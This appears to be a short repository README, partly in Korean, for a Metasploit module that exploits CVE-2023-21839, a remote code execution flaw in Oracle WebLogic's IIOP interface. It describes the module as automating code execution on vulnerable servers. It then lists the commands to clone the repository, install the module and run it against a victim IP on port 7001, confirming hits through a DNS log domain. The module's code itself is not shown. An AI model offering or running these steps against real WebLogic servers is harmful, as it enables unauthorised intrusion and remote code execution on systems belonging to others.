
Metasploit 보조 모듈로, DNS 로그 검증을 통해 CVE-2023-21839(WebLogic IIOP RCE)를 악용합니다. 취약한 Oracle WebLogic 서버를 대상으로 원격 코드 실행을 자동화합니다.
git clone https://github.com/kurehalin/CVE-2023-21839-metasploit-scanner
cd CVE-2023-21839-metasploit-scanner
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp weblogic_iiop_rce.py ~/.msf4/modules/auxiliary/scanner/http
chmod +x ~/.msf4/modules/auxiliary/scanner/http/weblogic_iiop_rce.py
msfconsole
use auxiliary/scanner/http/weblogic_iiop_rce
set rhost <victim ip>
set rport 7001
set verify_dns_log <your specific dnslog domain>
run
